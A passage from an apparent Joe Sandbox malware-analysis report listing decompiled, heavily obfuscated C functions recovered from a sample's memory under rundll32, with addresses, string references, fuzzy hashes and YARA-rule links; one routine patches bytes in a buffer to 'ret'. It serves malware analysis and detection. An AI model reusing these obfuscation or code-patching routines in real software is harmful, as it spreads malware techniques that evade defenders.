				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E007A8E4D);
				_push(__edx);
				E007B20B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E007BC15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E007A8E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E007B1E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E007A5988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E007A2A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

0x007ae2d6
0x007ae2dd
0x007ae2e4
0x007ae2e5
0x007ae2ea
0x007ae2ec
0x007ae2f1
0x007ae2f9
0x007ae2fc
0x007ae306
0x007ae30e
0x007ae313
0x007ae31b
0x007ae322
0x007ae325
0x007ae331
0x007ae335
0x007ae33d
0x007ae345
0x007ae34d
0x007ae355
0x007ae359
0x007ae361
0x007ae369
0x007ae36e
0x007ae37a
0x007ae37f
0x007ae385
0x007ae38d
0x007ae395
0x007ae39a
0x007ae3a2
0x007ae3aa
0x007ae3b2
0x007ae3b7
0x007ae3bf
0x007ae3cb
0x007ae3d0
0x007ae3d6
0x007ae3de
0x007ae3e6
0x007ae3ee
0x007ae3fa
0x007ae3ff
0x007ae405
0x007ae40d
0x007ae415
0x007ae41d
0x007ae425
0x007ae42d
0x007ae435
0x007ae43d
0x007ae449
0x007ae44c
0x007ae450
0x007ae458
0x007ae460
0x007ae46a
0x007ae474
0x007ae47c
0x007ae484
0x007ae48e
0x007ae492
0x007ae49a
0x007ae4a2
0x007ae4aa
0x007ae4af
0x007ae4b7
0x007ae4bb
0x007ae4bb
0x007ae4c9
0x007ae56a
0x007ae57d
0x007ae582
0x007ae589
0x007ae58b
0x007ae55b
0x007ae55b
0x00000000
0x007ae55b
0x007ae4d5
0x007ae54a
0x007ae553
0x007ae555
0x00000000
0x007ae555
0x007ae4dd
0x007ae532
0x007ae536
0x00000000
0x007ae536
0x007ae4e5
0x007ae4e9
0x00000000
0x007ae505
0x00000000
0x007ae4e9
0x007ae51b
0x007ae520
0x007ae525
0x007ae52c
0x007ae52e
0x00000000
0x007ae52e
0x007ae512
0x007ae512
0x007ae512
0x007ae5a6
0x007ae5ab
0x007ae5b0
0x007ae5bc
0x00000000
0x007ae5b2
0x007ae5b2
0x00000000
0x007ae5b2
0x00000000
0x007ae5be
0x007ae5be
0x00000000

Strings

`ee, xrefs: 007AE3AA
If, xrefs: 007AE3E6
N, xrefs: 007AE474
f~8, xrefs: 007AE31B
^Q, xrefs: 007AE405
o`, xrefs: 007AE3B7
R5C, xrefs: 007AE33D

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: If$R5C$^Q$`ee$f~8$o`$N
API String ID: 0-3572798563
Opcode ID: 316c5c0c55f53b97c8bbefc0d32dd297a757527b138f1dd993ed86a962dd4972
Instruction ID: 7c87423259f35e05a1aff377e70ae271342c9d21e6b9b982cd5e185602f42cf8
Opcode Fuzzy Hash: 316c5c0c55f53b97c8bbefc0d32dd297a757527b138f1dd993ed86a962dd4972
Instruction Fuzzy Hash: 62717672508301DFC358CF26D88945FBBE1EBC5768F504A1DF596962A0D7798A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 10014B9E

Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4

__snprintf_s.LIBCMT ref: 10014BD7

Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
LoadLibraryA.KERNEL32(?), ref: 10014C25

Strings

LOC, xrefs: 10014B96

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 3864805678-519433814
Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1

Uniqueness

Uniqueness Score: -1.00%

Function 007ACF47 Relevance: 7.9, Strings: 6, Instructions: 380
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007ACF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E007B8519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E007A7735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E007B0AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E007A7FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E007A70B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E007BAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E007A7E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E007AED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E007AA492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E007B0AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E007B8519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}

0x007acf4e
0x007acf57
0x007acf5f
0x007acf66
0x007acf6d
0x007acf6e
0x007acf75
0x007acf76
0x007acf77
0x007acf78
0x007acf79
0x007acf7e
0x007acf86
0x007acf89
0x007acf93
0x007acf98
0x007acf9d
0x007acfa5
0x007acfad
0x007acfb8
0x007acfc0
0x007acfcb
0x007acfd3
0x007acfdb
0x007acfe3
0x007acfeb
0x007acff3
0x007ad001
0x007ad006
0x007ad00c
0x007ad015
0x007ad018
0x007ad020
0x007ad024
0x007ad02c
0x007ad034
0x007ad03c
0x007ad044
0x007ad04c
0x007ad054
0x007ad064
0x007ad06c
0x007ad06f
0x007ad073
0x007ad07b
0x007ad083
0x007ad088
0x007ad08d
0x007ad095
0x007ad09d
0x007ad0a5
0x007ad0b2
0x007ad0b6
0x007ad0be
0x007ad0c6
0x007ad0cb
0x007ad0d8
0x007ad0dc
0x007ad0e4
0x007ad0ec
0x007ad0f8
0x007ad0fd
0x007ad103
0x007ad10b
0x007ad116
0x007ad11e
0x007ad129
0x007ad131
0x007ad13e
0x007ad141
0x007ad14a
0x007ad14e
0x007ad156
0x007ad15e
0x007ad163
0x007ad16b
0x007ad17b
0x007ad184
0x007ad187
0x007ad18b
0x007ad193
0x007ad19e
0x007ad1a9
0x007ad1b4
0x007ad1bc
0x007ad1c1
0x007ad1c6
0x007ad1ce
0x007ad1d6
0x007ad1de
0x007ad1e3
0x007ad1e8
0x007ad1f0
0x007ad1f8
0x007ad1fd
0x007ad205
0x007ad209
0x007ad211
0x007ad219
0x007ad226
0x007ad22a
0x007ad232
0x007ad23a
0x007ad247
0x007ad248
0x007ad24c
0x007ad254
0x007ad25c
0x007ad26a
0x007ad273
0x007ad277
0x007ad27f
0x007ad287
0x007ad28c
0x007ad291
0x007ad299
0x007ad2a4
0x007ad2af
0x007ad2ba
0x007ad2c5
0x007ad2d0
0x007ad2db
0x007ad2ec
0x007ad2ef
0x007ad2f3
0x007ad2fb
0x007ad303
0x007ad30b
0x007ad310
0x007ad315
0x007ad31d
0x007ad328
0x007ad333
0x007ad33e
0x007ad346
0x007ad350
0x007ad354
0x007ad35c
0x007ad36c
0x007ad370
0x007ad375
0x007ad37d
0x007ad385
0x007ad390
0x007ad39b
0x007ad3a6
0x007ad3ae
0x007ad3b6
0x007ad3bf
0x007ad3c2
0x007ad3c9
0x007ad3cd
0x007ad3d5
0x007ad3e0
0x007ad3eb
0x007ad3f6
0x007ad3fe
0x007ad406
0x007ad40e
0x007ad41b
0x007ad41f
0x007ad41f
0x007ad427
0x007ad427
0x007ad427
0x007ad427
0x007ad42d
0x00000000
0x00000000
0x007ad433
0x007ad553
0x007ad559
0x00000000
0x007ad559
0x007ad43f
0x007ad4e3
0x007ad4f6
0x007ad4ff
0x007ad509
0x007ad51f
0x007ad52b
0x007ad530
0x007ad535
0x007ad5a7
0x007ad5b8
0x007ad5b8
0x007ad537
0x00000000
0x007ad537
0x007ad44b
0x007ad4b7
0x007ad4cb
0x007ad4d0
0x00000000
0x007ad4d0
0x007ad453
0x007ad477
0x007ad478
0x007ad479
0x007ad47e
0x007ad484
0x007ad498
0x007ad486
0x007ad486
0x007ad491
0x007ad491
0x00000000
0x007ad484
0x007ad45b
0x00000000
0x00000000
0x007ad461
0x007ad461
0x007ad569
0x007ad6ac
0x007ad6b1
0x007ad6b6
0x007ad6c2
0x00000000
0x007ad6c2
0x007ad6b8
0x00000000
0x007ad6b8
0x007ad575
0x007ad65b
0x007ad674
0x007ad679
0x007ad67e
0x00000000
0x00000000
0x007ad684
0x00000000
0x007ad684
0x007ad581
0x007ad5b9
0x007ad5c8
0x007ad5d1
0x007ad5ee
0x007ad5f3
0x007ad60e
0x007ad613
0x007ad616
0x007ad619
0x007ad61d
0x007ad630
0x007ad63f
0x007ad646
0x007ad64b
0x007ad64f
0x00000000
0x00000000
0x00000000
0x00000000
0x007ad61f
0x007ad61f
0x007ad626
0x007ad628
0x007ad628
0x007ad62b
0x007ad62c
0x00000000
0x007ad61f
0x007ad589
0x00000000
0x00000000
0x007ad5a1
0x00000000
0x007ad6c7
0x007ad6c7
0x00000000

Strings

rg', xrefs: 007AD103
qb+, xrefs: 007AD385
, xrefs: 007AD51F
uwjP, xrefs: 007AD1FD
M, xrefs: 007AD3E0
za%, xrefs: 007ACFAD

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $qb+$rg'$uwjP$za%$M
API String ID: 0-3591755710
Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
Instruction ID: 90331b8644d1e23f27d655b251f624be8fcb8aae0d60c3dfe4fd24075ef9e113
Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
Instruction Fuzzy Hash: 461201715083809FD768CF25C48AA5BFBF1FBC5348F108A1DF69A8A261DBB59944CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007B907F Relevance: 7.8, Strings: 6, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007B907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
